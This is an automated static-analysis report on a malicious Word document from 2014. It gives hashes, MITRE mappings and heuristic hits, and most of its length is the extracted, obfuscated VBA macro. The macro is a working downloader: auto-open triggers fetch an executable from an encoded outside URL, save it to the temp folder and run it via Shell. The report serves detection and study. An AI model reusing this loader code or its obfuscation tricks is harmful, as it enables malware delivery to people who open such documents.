Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4ec1076a9359aa25…

MALICIOUS

Office (OLE)

Size: 57.0 KB
Created: 2014-10-21 17:27:00
Authoring application: Microsoft Office Word
First seen: 2014-11-01
MD5: 1a9859af7fd60f43a3c3f0a466d0a131
SHA-1: cd905b18da998b1bb480121a25310a03e6f1eef7
SHA-256: 4ec1076a9359aa2506b44b08e84af59b71481b6170cc2084503c2210f31eefa3
Risk Score: 332

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains heavily obfuscated VBA macros with multiple auto-execution triggers (Auto_Open, AutoOpen). These macros utilize CreateObject and Shell calls, indicating an attempt to download and execute a secondary payload. The presence of the email address 'facepa1m@live.ru' within the document's metadata suggests a potential phishing lure.

Heuristics 11

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        WBVSWOEAZVI = Shell(EBDHKIKBOCB, 1)
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set WQTQGAKEBGH = CreateObject(StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("534D")) + "XML2.XM" + "LHTTP")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set WQTQGAKEBGH = CreateObject(StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("534D")) + "XML2.XM" + "LHTTP")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        OJFXJUFZDBX StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6578652E312F736567616D692F6F722E646172612D6473702F2F3A70747468")), Environ("TEMP") & "\VGOMMYAIMDT.exe"
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 22028 bytes
SHA-256: f0f7e02ac879d1c16548421e122bb9093fe21c24f0f5e83be7a406ce788d6150
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
GoTo imiddacdxatchdzgqjqqaxyritnzbukridfmlyhvcaktwvln
Dim yvoxouprylrhygxfwnvhugxushrkategfdjjvunvggxzwnwz As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6A6267746C6769776F71786A746A776366746F717363787A676D76616579646974776B7A6E76716E657877626C6B637A")) For Binary As #6384
Put #6384, , yvoxouprylrhygxfwnvhugxushrkategfdjjvunvggxzwnwz
Close #6384
imiddacdxatchdzgqjqqaxyritnzbukridfmlyhvcaktwvln:
GoTo qggslqpofqvvndehplkqylvvrykiythtmdrhpxislpvoclse
Dim vlftoqjglmpvviwdyuyvbvgbllpxyfpyswstungsquphstkv As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("71626379736962776671637962616E726C7373666977687A63676C626E6465786E72666375796D6C6E70727A6A686870")) For Binary As #34446
Put #34446, , vlftoqjglmpvviwdyuyvbvgbllpxyfpyswstungsquphstkv
Close #34446
qggslqpofqvvndehplkqylvvrykiythtmdrhpxislpvoclse:
GoTo smaqnukkwflpzqdmkfvxpgcpotikrvyxlrefygrmjrtgskrj
Dim jogoibwlonsgshjpgdgpljsjkahungpirxtrrtadodepqcax As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6B6C6169707A7668656E6B7A7479696F6D6A767A68636D65666F77746A686265646D726F6E656E766970646676766373")) For Binary As #36904
Put #36904, , jogoibwlonsgshjpgdgpljsjkahungpirxtrrtadodepqcax
Close #36904
smaqnukkwflpzqdmkfvxpgcpotikrvyxlrefygrmjrtgskrj:
TFCVDJEJBJJ
End Sub
Sub AutoOpen()
GoTo fniniamuscycybzhxruhunxfqkfqjsxxblkyqgqcgslloxyr
Dim crmnncwcgvqazpdarbzxhylrxsecsipdhunklegrjwkeojyi As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("66657561766C6C6E6176707776767566727561676376747A66627972726267707864646B7A6662716A6F7570616D6773")) For Binary As #43632
Put #43632, , crmnncwcgvqazpdarbzxhylrxsecsipdhunklegrjwkeojyi
Close #43632
fniniamuscycybzhxruhunxfqkfqjsxxblkyqgqcgslloxyr:
GoTo vefvyqnfcqibfmwaxdsjxypuvclynhzbrnxqtpvdpyuytozx
Dim qwfodqdisgobrcwsgqlslpnjuutgjohjzgbnyladauoqxual As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("636C7873776E7179776D6663616E616D797A7773786679786679767275716677726464666F64666B6D77797562637967")) For Binary As #13653
Put #13653, , qwfodqdisgobrcwsgqlslpnjuutgjohjzgbnyladauoqxual
Close #13653
vefvyqnfcqibfmwaxdsjxypuvclynhzbrnxqtpvdpyuytozx:
GoTo tiumrisjxruxvqojyqptnxvflqjzweldmjtvuxglrztyaply
Dim eglkuhfwmanicqeuiswbgngqxtyqpkcxcmgsulfgqcytosue As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6E6A6C6871746477686C68796566726A7967686B686A776A6B6777686D6E6276657476787178616D67696C6F6177616B")) For Binary As #41695
Put #41695, , eglkuhfwmanicqeuiswbgngqxtyqpkcxcmgsulfgqcytosue
Close #41695
tiumrisjxruxvqojyqptnxvflqjzweldmjtvuxglrztyaply:
    Auto_Open
End Sub
Sub Workbook_Open()
GoTo ztgglbvveqggfokcqcvgapzhrjxebygiqengiqrdigugfuxq
Dim dljznsrfpgsbraqpmnisulmxivobcbapdhsduvxfaruvbcpw As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6E7266636D737576777A776675616D6A6B757969637A7363737A796A6E6D726A61626E6A7571686C7071747669786469")) For Binary As #49957
Put #49957, , dljznsrfpgsbraqpmnisulmxivobcbapdhsduvxfaruvbcpw
Close #49957
ztgglbvveqggfokcqcvgapzhrjxebygiqengiqrdigugfuxq:
GoTo hmjettrrimxuijtgzokspdldwnqpxqtnmszpzbfdasbgvrhm
Dim kghscnksqdzjytrdntkyawiorzenatquvillguddackkltug As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("69617A61796665776F78646D746C70637A676D736977616562736C786E676D686169686D6D697367686D656765716A78")) For Binary As #14350
Put #14350, , kghscnksqdzjytrdntkyawiorzenatquvillguddackkltug
Close #14350
hmjettrrimxuijtgzokspdldwnqpxqtnmszpzbfdasbgvrhm:
GoTo ssmpcumjbthzapdvtiqfuvqehajscnyfpagarngauwwtyenh
Dim mxpopfeqsvwytecsaqfjiwxsxgchcnfylvjblatbhljggshm As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("727A6C6B7A697877706D6870686A6761746766666D677A726F6D64616563746B6565747A6C7876656C796D6E686C7867")) For Binary As #34623
Put #34623, , mxpopfeqsvwytecsaqfjiwxsxgchcnfylvjblatbhljggshm
Close #34623
ssmpcumjbthzapdvtiqfuvqehajscnyfpagarngauwwtyenh:
    Auto_Open
End Sub
Function OJFXJUFZDBX(ByVal XDQPBMZWZVE As String, ByVal EBDHKIKBOCB As String) As Boolean
     Dim WQTQGAKEBGH As Object, ZIOOUFBOHTB As Long, JFDTBJWPCNU As Long, WGZWKGZMUTY() As Byte

GoTo etdmtxhjlvptfzqdfochzlzffbmifxstjgxoskksowffztny
Dim kwlbreyoqotabzuvsjrefvqnjxvxdupznanxvjlowqmdhmjd As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("79796774646A676D6D6A6166766E7666646A6C6277727A65766D616B6D74736B6B6B6174786269796D76696D66617564")) For Binary As #46512
Put #46512, , kwlbreyoqotabzuvsjrefvqnjxvxdupznanxvjlowqmdhmjd
Close #46512
etdmtxhjlvptfzqdfochzlzffbmifxstjgxoskksowffztny:
GoTo jlvkgvudfgwiofmsjdqjaagqleaofddoxtsqaajnhnmwadjb
Dim zugrhbycnzdgwskzylwtbwkbazwhjihmzmoatfgdmdrtizkl As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("636E736671657761666C6172776974687A74746373646965636B766E7562686375717977626E786E7573736B686A7275")) For Binary As #17297
Put #17297, , zugrhbycnzdgwskzylwtbwkbazwhjihmzmoatfgdmdrtizkl
Close #17297
jlvkgvudfgwiofmsjdqjaagqleaofddoxtsqaajnhnmwadjb:
    Set WQTQGAKEBGH = CreateObject(StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("534D")) + "XML2.XM" + "LHTTP")
GoTo pzrjnbmdtzvojwutskgkrjdqvkquqtxjogpqhdthzqgdahdk
Dim gwscenzdbdfxqegcltaaovdxtgmsldyylbxdhphynogrnunu As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6472767373796467716976697778686172696B69636B7A68716B796468707075677879797474646B7363786F716F7771")) For Binary As #67645
Put #67645, , gwscenzdbdfxqegcltaaovdxtgmsldyylbxdhphynogrnunu
Close #67645
pzrjnbmdtzvojwutskgkrjdqvkquqtxjogpqhdthzqgdahdk:
GoTo iqyandzugojtkmciyuvvnjzfinylpmcokibqiugkcjzjerkd
Dim jndjumicuhccvzqhfngvqaphzbgwwrhrzzumbxktlwasbltm As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("72677577626E6F7175726F6371796B676A79716D6A627867666F7277626F787173656A63796F68757564666F6D676364")) For Binary As #23692
Put #23692, , jndjumicuhccvzqhfngvqaphzbgwwrhrzzumbxktlwasbltm
Close #23692
iqyandzugojtkmciyuvvnjzfinylpmcokibqiugkcjzjerkd:
GoTo crmnncwcgvqazpdarbzxhylrxsecsipdhunklegrjwkeojyi
Dim hgzxcniccpejjpvdispbjlzudfqbvdnbshabimfwvruydaio As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("666E687179626A7770647A626D73736A6A72636F746D646B727172776578637674796D6261766F61676E66716D657161")) For Binary As #69554
Put #69554, , hgzxcniccpejjpvdispbjlzudfqbvdnbshabimfwvruydaio
Close #69554
crmnncwcgvqazpdarbzxhylrxsecsipdhunklegrjwkeojyi:
    WQTQGAKEBGH.Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("544547")), XDQPBMZWZVE, False
GoTo yfmvkuczipgzibdcfwflspfxrkserrscwcaeelaakqqoktpo
Dim ayucaihzajixhhpknunqtndxsfwqzbxwkeoeiwllxxyqkius As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("75686E786874646371726B7563696D706766636C6866617270737779777272686678706774726B73796F7864746F6576")) For Binary As #16460
Put #16460, , ayucaihzajixhhpknunqtndxsfwqzbxwkeoeiwllxxyqkius
Close #16460
yfmvkuczipgzibdcfwflspfxrkserrscwcaeelaakqqoktpo:
GoTo nojozkuqujtkcxtbiohnenosioudykvauctpxyoiwmvznbcm
Dim cpufsvbsntkgmjvofkrtygponbdazfiammolmyxxtwdulwzz As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6A6A6F656772767075687071756F6B6F6D706B64786572696A62766D7A67727161726C686E6F74716D61706B6F687061")) For Binary As #64341
Put #64341, , cpufsvbsntkgmjvofkrtygponbdazfiammolmyxxtwdulwzz
Close #64341
nojozkuqujtkcxtbiohnenosioudykvauctpxyoiwmvznbcm:
GoTo adgbzdcbnkgrxhjcfqtqnnalvawqhvvunllzlaaykslituih
Dim xhypbvakjwufrnojqblobafjzgvopzmsufvrkepxfojaqpfw As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("62796E736B646B7471776E66696268746878677A7163656F72746E6F736877756663696276727773657A716A73706B6B")) For Binary As #97034
Put #97034, , xhypbvakjwufrnojqblobafjzgvopzmsufvrkepxfojaqpfw
Close #97034
adgbzdcbnkgrxhjcfqtqnnalvawqhvvunllzlaaykslituih:
    WQTQGAKEBGH.Send "send request"

GoTo dljznsrfpgsbraqpmnisulmxivobcbapdhsduvxfaruvbcpw
Dim jtafvwvpfxgwaqfclvtgfrvodrethgwccbivporturohntvc As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6C74636564757A697569746F6A69656A757064787166717475766E6668617A796F67766D66617866726C746263647764")) For Binary As #97193
Put #97193, , jtafvwvpfxgwaqfclvtgfrvodrethgwccbivporturohntvc
Close #97193
dljznsrfpgsbraqpmnisulmxivobcbapdhsduvxfaruvbcpw:
GoTo hgwkhazdouyqmroncwencysqfmxyvecfarlgrtqowuumzbcb
Dim uvgfffndleiyreeamyesclerespiibsnvswxxsluaibdgobn As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6568766564676575626A6373766562736A7569656A6C61697173726D75747168656670646C737774776B6C696C767377")) For Binary As #46676
Put #46676, , uvgfffndleiyreeamyesclerespiibsnvswxxsluaibdgobn
Close #46676
hgwkhazdouyqmroncwencysqfmxyvecfarlgrtqowuumzbcb:
GoTo mxpopfeqsvwytecsaqfjiwxsxgchcnfylvjblatbhljggshm
Dim arurfitxyvpxncpqpdeaijysrixuwcxsbbnypiikevoaxrdf As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6F6D766665707867636B627867766278656968727568646570666A6270756C6D677068727274627A687A656E79756668")) For Binary As #90494
Put #90494, , arurfitxyvpxncpqpdeaijysrixuwcxsbbnypiikevoaxrdf
Close #90494
mxpopfeqsvwytecsaqfjiwxsxgchcnfylvjblatbhljggshm:
    Do While WQTQGAKEBGH.readyState <> 4
GoTo phznknrlybwjbvvshcrdogtnwqhkyieuzmbluqmwteypcsqf
Dim ahfhidtvepdrsujzqbapciyaeysfynvnqbaijxpuiahmmzdg As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("69776E6A6D746368626975746F737A796B77696C7A6F74756267786D6A646F75666E76706A726F6968766B6665637163")) For Binary As #96367
Put #96367, , ahfhidtvepdrsujzqbapciyaeysfynvnqbaijxpuiahmmzdg
Close #96367
phznknrlybwjbvvshcrdogtnwqhkyieuzmbluqmwteypcsqf:
GoTo ncwhyxfafewsviozrbvripvochwgkkgcjowluwhheyojqhmm
Dim wjmgkctatmcfenjhkdotdnxowszdtpbeflslxrrtmmvbqkvq As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6373726869696E6F756F79726B646E756E686F73696D706368756C69686268796672786B62786E667472706E676A7974")) For Binary As #5726
Put #5726, , wjmgkctatmcfenjhkdotdnxowszdtpbeflslxrrtmmvbqkvq
Close #5726
ncwhyxfafewsviozrbvripvochwgkkgcjowluwhheyojqhmm:
GoTo ndgnhoekgasvwokpqytywaxfvjuoovaovvgvxveumgpjmchn
Dim bmhicjlonlahzzlowjawmwajlbfhxzhqwvkfkbhilqjrabkp As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6A786664736963796569646F776B67736C6A6E646D65726163686477757A7769616E766D6D716C716977646167636E73")) For Binary As #14676
Put #14676, , bmhicjlonlahzzlowjawmwajlbfhxzhqwvkfkbhilqjrabkp
Close #14676
ndgnhoekgasvwokpqytywaxfvjuoovaovvgvxveumgpjmchn:
    DoEvents
GoTo hbepjbtuzlzpgmywbuecxxwepsxzwflkzrkosjsjzkaihwlz
Dim nlrmcpytjwzwtwuwdacivyfkkkgcfcikgubdqutzdqkgvwtb As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("71626979656661726C6873676A6E6F6465656B677466796879747269617074716B7A646E666971736F6A686771697765")) For Binary As #23763
Put #23763, , nlrmcpytjwzwtwuwdacivyfkkkgcfcikgubdqutzdqkgvwtb
Close #23763
hbepjbtuzlzpgmywbuecxxwepsxzwflkzrkosjsjzkaihwlz:
GoTo qwkbavnkfniijlymxsejoxufjupriutparsoeevipjyrzzoq
Dim eekbykqbbjzjivyfyvwshpcljwtgguqidnhymueuaffbjyfu As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6669786C7274756A7776787163686A78757778726E766D6E626177696B66736372676D6361646A6B7665667A65627775")) For Binary As #56197
Put #56197, , eekbykqbbjzjivyfyvwshpcljwtgguqidnhymueuaffbjyfu
Close #56197
qwkbavnkfniijlymxsejoxufjupriutparsoeevipjyrzzoq:
GoTo bpnyhjhwvnkooaanozzktvosbvtslxuzdgtbpgfrjgoyfkmx
Dim vdqgixvkrtvmcirtjronhggctebktztgapgzdzzhwnanegep As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6873726E786D6A656A62696164666A656E636F6466696C6D7867696A6D686C7471796678707074727371626F76656D70")) For Binary As #43904
Put #43904, , vdqgixvkrtvmcirtjronhggctebktztgapgzdzzhwnanegep
Close #43904
bpnyhjhwvnkooaanozzktvosbvtslxuzdgtbpgfrjgoyfkmx:
    Loop

GoTo eahxxouxecdvxrkzxxxqmgaxumzkmltmgdkecruulhxsjzer
Dim vhqrtzykmbxmdmrermhkdvpysnysvctyekvuaywhzbnkblbi As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("666C79757578746678646163786271716F6C6B627A746861786678766F6472706C696F747A6F627A776B6B7663746B71")) For Binary As #95145
Put #95145, , vhqrtzykmbxmdmrermhkdvpysnysvctyekvuaywhzbnkblbi
Close #95145
eahxxouxecdvxrkzxxxqmgaxumzkmltmgdkecruulhxsjzer:
GoTo aysfrheqcqxgfrlgtjygzdzoenipqlwfswxmyvoaojopaqdk
Dim hwtfbtmpoglfkpxpbguvnazobagwntgkdvnoggujcfkcolrc As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6C78746E63796E7175746E657A6E706B7570687A61786D6479716764776F6E6764726D62627A6676616C707771687561")) For Binary As #37532
Put #37532, , hwtfbtmpoglfkpxpbguvnazobagwntgkdvnoggujcfkcolrc
Close #37532
aysfrheqcqxgfrlgtjygzdzoenipqlwfswxmyvoaojopaqdk:
GoTo cpfxuloegefcsmhxyobolasxysvogpsjjatxadwsinmkuohy
Dim zjvfpvzuqmeisnmdiludygwashhkeyymszhnsiwnymajkare As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6E666B78646E6B756D75746D6C676B747A627261666264726E776975666668766E737261716B6177716A6178636E6669")) For Binary As #93158
Put #93158, , zjvfpvzuqmeisnmdiludygwashhkeyymszhnsiwnymajkare
Close #93158
cpfxuloegefcsmhxyobolasxysvogpsjjatxadwsinmkuohy:
    WGZWKGZMUTY = WQTQGAKEBGH.responseBody

GoTo ofncleimfkwmwaasiadnfyifrvzcyrzpuplhyofnbgyrkdyh
Dim dewkzyszjqbiybtyvgkucdfqcwemybltzsnpwplpsdqllfvq As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("766B7161756870656B616768766E666F6F6671756F656F78757961756D676964656F796E77787173627A736469797479")) For Binary As #28613
Put #28613, , dewkzyszjqbiybtyvgkucdfqcwemybltzsnpwplpsdqllfvq
Close #28613
ofncleimfkwmwaasiadnfyifrvzcyrzpuplhyofnbgyrkdyh:
GoTo cvzivwrorpfnsdatmyfdxnbjfevdrdncicynzwlqymvszpbp
Dim sclguimjiailizuaatcdzylaccsyqkvpwupdpzlfsqcaqzvr As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("617161727568786B6E7A6E64717062646F62726F6C77777475746A666B74706A71687663736D617368737263706E636A")) For Binary As #44114
Put #44114, , sclguimjiailizuaatcdzylaccsyqkvpwupdpzlfsqcaqzvr
Close #44114
cvzivwrorpfnsdatmyfdxnbjfevdrdncicynzwlqymvszpbp:
GoTo zzlaawdrrnnnrbwueusdfgerhkhkmutxwvyilaooapkmssek
Dim wahxjjggotmhwnliamxywjxuugnuekpsdifyjksialhozmah As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("706F6A6A746675736F6867686E666774636168616569737374787065756C766A727765716E63796F6E69776C726B626A")) For Binary As #63553
Put #63553, , wahxjjggotmhwnliamxywjxuugnuekpsdifyjksialhozmah
Close #63553
zzlaawdrrnnnrbwueusdfgerhkhkmutxwvyilaooapkmssek:
    JFDTBJWPCNU = FreeFile
GoTo qgttmkuektzzjkiwtnylmdusepbmyhklmcgbbjexxuvjfwcg
Dim lbjrvcsyecnuzaquaokwmiapsvrfyhvzuikcxlxiqtpbzsdm As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("72696B7672646E7972687467646A6E6B706E77766263657A6B686C776961636B6E6D666E6C6B637674676F7361767672")) For Binary As #56956
Put #56956, , lbjrvcsyecnuzaquaokwmiapsvrfyhvzuikcxlxiqtpbzsdm
Close #56956
qgttmkuektzzjkiwtnylmdusepbmyhklmcgbbjexxuvjfwcg:
GoTo wxyjalgfeaqcamcztvhtynphhmzdmomixhpirdhxrjugukbt
Dim ekfqzxxkqsbruawjpixtmnozsvzdeiscedqnhzbamyqecjmi As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("676375666371726F7975616B746B73716862617464677161716A6E6A686E626D73777166686F66797073797477646D6F")) For Binary As #60915
Put #60915, , ekfqzxxkqsbruawjpixtmnozsvzdeiscedqnhzbamyqecjmi
Close #60915
wxyjalgfeaqcamcztvhtynphhmzdmomixhpirdhxrjugukbt:
GoTo aizwoivbncoervbqejqhamzyvjapmrtvxygiylbyoeldnqzi
Dim tuzhjiawhipevobwcrisufmhyahllnagdxlgunsyarqbhkmf As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6F7A696661767576636D74666F6A746A7A7575676A6A6778747A716A6E6D73737065757567736F786D626467646B7173")) For Binary As #34306
Put #34306, , tuzhjiawhipevobwcrisufmhyahllnagdxlgunsyarqbhkmf
Close #34306
aizwoivbncoervbqejqhamzyvjapmrtvxygiylbyoeldnqzi:
    If Dir(EBDHKIKBOCB) <> StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("")) Then Kill EBDHKIKBOCB
    Open EBDHKIKBOCB For Binary As #JFDTBJWPCNU
    Put #JFDTBJWPCNU, , WGZWKGZMUTY
    Close #JFDTBJWPCNU
GoTo fdmsdtgqrurjbedffqoilzitqntxjicsskoldnrodkvtxcba
Dim gctxumheqecmagirzgjlyfoekvxlwzbmtjzqofynkewrnsbs As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("74686A6A726F6A636B74626E6578667A6B6565676E7763726C6B6B70766C6E61626C65697A6A7779787467646D68616D")) For Binary As #99823
Put #99823, , gctxumheqecmagirzgjlyfoekvxlwzbmtjzqofynkewrnsbs
Close #99823
fdmsdtgqrurjbedffqoilzitqntxjicsskoldnrodkvtxcba:
GoTo qkgqhqwouxxvhewfncxpeawyssbwbuhbqihsiylsoizaketq
Dim irptpukhpvdklcmrwvtwganpcrlwenfrnrxmerpvbvtpvxes As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("797661796D71726A65776E6A66787976696E7774646C7A786E6C6E6E78776C697166747A616D76746C6D666462767964")) For Binary As #66032
Put #66032, , irptpukhpvdklcmrwvtwganpcrlwenfrnrxmerpvbvtpvxes
Close #66032
qkgqhqwouxxvhewfncxpeawyssbwbuhbqihsiylsoizaketq:
GoTo dvvhbutfppycgimjkxtnoqpsudjjiyonnwbmcfodqvukqucc
Dim mbhohgcxsalpqdqmxextcuziblzgcqenlydyafcjrlxfzdpu As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("646A71767067786F736A6C7763737661627279676E646275686E6B6A7A727573716D6879727061727A6E617768636266")) For Binary As #40444
Put #40444, , mbhohgcxsalpqdqmxextcuziblzgcqenlydyafcjrlxfzdpu
Close #40444
dvvhbutfppycgimjkxtnoqpsudjjiyonnwbmcfodqvukqucc:
    
    Dim WBVSWOEAZVI
GoTo dmvtxuhdhfrvramgrlakysjzfubamiollmiczbqfzcriczkx
Dim psxojebcebofvkbqipzsdzreerqxpgcvhoxacoqsayuiuqbx As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6B6F70747A646F62716B6871747A77716565637970656F697A6A6D7A6E646A626F656A7563616E73657A6268796C636A")) For Binary As #66538
Put #66538, , psxojebcebofvkbqipzsdzreerqxpgcvhoxacoqsayuiuqbx
Close #66538
dmvtxuhdhfrvramgrlakysjzfubamiollmiczbqfzcriczkx:
GoTo pxfxkmdqqumxngqlkoblarwfbfzjqvpriemoaiztktgyodly
Dim ajdgchqwqfsflqqwvomfdafyxezwkdqdcxiwxtimirmoynoe As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6E6B6A6474627A6F7378777A7A696C6A76706D766A656B6872647266677479646A65626B766267716776716262676676")) For Binary As #34151
Put #34151, , ajdgchqwqfsflqqwvomfdafyxezwkdqdcxiwxtimirmoynoe
Close #34151
pxfxkmdqqumxngqlkoblarwfbfzjqvpriemoaiztktgyodly:
GoTo msqgaowwuggrwmtcioedsqbhfvyjyqzzmengxaqctbuugwvy
Dim nixwghekgyycfkbjoewerstwcegaerobpdazafluqyzoeukq As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("766363796A66617577786C7761617777767A6F78787461746D707A62696475627574776C796E7975687973716E777566")) For Binary As #13237
Put #13237, , nixwghekgyycfkbjoewerstwcegaerobpdazafluqyzoeukq
Close #13237
msqgaowwuggrwmtcioedsqbhfvyjyqzzmengxaqctbuugwvy:
    WBVSWOEAZVI = Shell(EBDHKIKBOCB, 1)

GoTo bkrifxodzexmtcpgqlkzhjgfdijktbfdjnxmmtzfpbgrmryh
Dim iyggmykzitafabewdcvcpgsycloafovczvwsubctkzxejabq As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("766C6A6E7A69716F6474776568776E706E6966677069757A78726474687A6B6C6B75756562627465626D6471746C6966")) For Binary As #76791
Put #76791, , iyggmykzitafabewdcvcpgsycloafovczvwsubctkzxejabq
Close #76791
bkrifxodzexmtcpgqlkzhjgfdijktbfdjnxmmtzfpbgrmryh:
GoTo uxpctscmbpodxncqaliybekcockyydvcmlbxaomtajzaoqwl
Dim gztepmtrvabnzcoyyipmoefzzqfysobifpsrzqvnntrdrbed As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("756E67756F766D667A6B796678736163796E76716C726E656C6C6673686563786E6B6E6E706B616B6575636261667071")) For Binary As #37069
Put #37069, , gztepmtrvabnzcoyyipmoefzzqfysobifpsrzqvnntrdrbed
Close #37069
uxpctscmbpodxncqaliybekcockyydvcmlbxaomtajzaoqwl:
    Set WQTQGAKEBGH = Nothing
GoTo tozyfipqosiefablsmfwrctnftcdoaattlastpzyqekjoerd
Dim jnesmwlsufvuodutzrzrmzelcgjxkczjakidfdcnnkvhnmck As String
Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("7A6A68697470626C7274796D6B69716D77796B6C7268657879636F7A76696D6D777A7873717A6477686162716569617A")) For Binary As #47174
Put #47174, , jnesmwlsufvuodutzrzrmzelcgjxkczjakidfdcnnkvhnmck
Close #47174
tozyfipqosiefablsmfwrctnftcdoaattlastpzyqekjoerd:
GoTo iprbpupajrxovkzgyxiukavaovuqjuedisewjvhosarairzq
Dim okpbralvtqqvgomzpuetnydrzjbykxnphvrdgdbcrblwwknw As String
